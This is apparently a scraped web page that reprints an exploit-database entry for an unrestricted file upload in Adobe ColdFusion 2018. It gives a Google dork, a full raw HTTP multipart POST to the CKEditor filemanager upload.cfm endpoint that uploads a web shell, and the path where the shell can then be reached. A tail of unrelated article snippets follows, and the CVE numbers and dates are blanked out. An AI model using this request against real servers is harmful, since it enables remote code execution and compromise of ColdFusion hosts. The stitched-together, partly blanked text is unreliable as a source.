[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload
# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion
have been elevated to Priority due to a report that CVE--
is now being actively exploited. ```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests: -----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg %shell code here%
-----------------------------
Content-Disposition: form-data; name="path" shell
-------------------------------
``` a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload的更多相关文章
- FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...
- jQuery File Upload 单页面多实例的实现
jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...
- 【转发】Html5 File Upload with Progress
Html5 File Upload with Progress Posted by Shiv Kumar on 25th September, 2010Senior Sof ...
- struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server
CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...
- jQuery File Upload done函数没有返回
最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...
- kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸
kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸
- 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮
需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...
- jquery file upload 文件上传插件
1. jquery file upload 下载 jquery file upload Demo 地址:https://blueimp.github.io/jQuery-File-Upload/ jq ...
随机推荐
- NodeJs命令
cd命令,就是change directory的缩写,表示更改当前目录 cls命令,清屏.清屏幕命令(CLS,CLear Screen) tab键,自动补全. 上键,提示最近的命令 在cmd窗口 ...
- WM-结汇
PI发给客户以后, 客户打过来定金之后. 把PI的 P单词去掉,改为只剩invoice, 再把PI改成一份contract为标题的文件,两份文件都是要自己和客户的签字的. 然后需要用这两份文件进行结汇 ...
- 视频和swf的相对路径加载,卸载
package com{ import flash.display.MovieClip; import flash.net.NetConnection; import flash.net.NetStr ...
- 解决在jupyter notebook中遇到的ImportError: matplotlib is required for plotting问题
昨天学习pandas和matplotlib的过程中, 在jupyter notebook遇到ImportError: matplotlib is required for plotting错误, 以下 ...
- exception is java.lang.IllegalArgumentException: No auto configuration classes found in META-INF/spring.factories. If you are using a custom packaging, make su re that file is correct.
spring cloud 项目使用maven 打包报错“No auto configuration classes found in META-INF/spring.factories” 在pom.x ...
- Python踩坑之 sys.argv[-1]代表什么
平台:win10+python 3.7.0 一.sys说明: sys.argv这个函数是我们写python脚本中最常用的一个函数. sys是Python的一个「标准库」,也就是官方出的「模块」,是「S ...
- PHY过采样问题
什么频率下进行过采样 ?? 按时程序是LMDS时钟小于100M时会进行过程采样,实际上PHY的文档上也有明确的说明: The minimum operational data rate is 1.0 ...
- discover功能--自动发现主机
discover功能,让监控的管理更加管理和自动化,现在来演示下如何使用discover功能自动发现主机 1.配置discover 2.在被侦测机上安装zabbix agent 安装完成后,修改配置( ...
- eclipse怎么删除多余的tomcat server(2)
首先你的Server要是可用状态,就是说当前这个tomcat处于可用状态才能点击那个Create Launch Configuration
- 前端之js
简介: JavaScript是运行在浏览器端的脚步语言,JavaScript主要解决的是前端与用户交互的问题,包括使用交互与数据交互,JavaScript是浏览器解释执行的 前端三大块 ...